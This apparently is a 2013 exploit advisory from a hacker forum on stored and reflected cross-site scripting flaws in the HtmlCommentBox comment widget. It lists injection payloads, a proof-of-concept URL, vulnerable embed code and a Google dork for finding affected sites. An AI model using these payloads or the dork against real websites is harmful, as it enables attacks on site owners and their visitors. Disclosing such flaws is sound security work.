facebook facebook twitter rss

HtmlCommentBox Multiple Vulnerabilities

Author: f4ry4r_red , Published: 04-06-2013
# Exploit Title: HtmlCommentBox Multiple Vulnerabilities
# Release Date: 01/06/2013
# Author: unknown digital security team
# Website: forums.hackfans.org
# Contact: f4ry4r_red@yahoo.com
# myname: f4ry4r_red
# Vendor: www.htmlcommentbox.com
# Versions Affected: All
# Google Dork: intext:"by HtmlCommentBox"
# Tested on : Windows



#D:: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ f4ry4r_red \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

# f4ry4r_red W4s H3r3...!

1. Stored Cross-Site Scripting Vulnerability-

Description:
The comment input in HtmlCommentBox is not sanitized. Therefore it results
in a stored cross-site scripting.

POC:
Input any of the following as comment-

<img src=x onerror=prompt(0);
<iframe/onload=prompt(0);
<svg/onload=prompt(0);

Fix:
Better sanitization of the input.

References:
http://www.rafayhackingarticles.net/2013/05/introducing-evil-in-your-website-with_31.html

2. Reflected Cross-Site Scripting-

Description:
Implementing HTMLCommentBox makes your website vulnerable to a non
persistent cross-site scripting.

The vulnerable code is as follows: (which the users use on ther page)


(function(){var s=document.createElement("script"),l=(""+window.location ||
hcb_user.PAGE),h="//www.htmlcommentbox.com";s.setAttribute("type","text/javascript");s.setAttribute("src",h+"/jread?page="+encodeURIComponent(l).replace("+","%2B")+"&opts=16862&num=10");if(typeof
s!="undefined")document.getElementsByTagName("head")[0].appendChild(s);})()


If we closely look at the window.location portion, we can see that
encodeURIComponent allows single quotes. If we just replace window.location
with our alert statement, it would triggered under the script context,
Hence making the website vulnerable to a XSS attacks. And
"/jread?page='-prompt(1)-'&opt=x&num=y" would be reflected under the page
context.


POC:
http://www.htmlcommentbox.com/?'-prompt(1)-'

Fix:
Better sanitization by restricting special characters.


################################################################################################################
Greetz : BlackErroR, X3NON ,Saman.gunner,HaCkeD,m3h2lad,Crack3R,Joker_S , ALI_TNP Crall of member In hackfans
################################################################################################################

Like us on Facebook :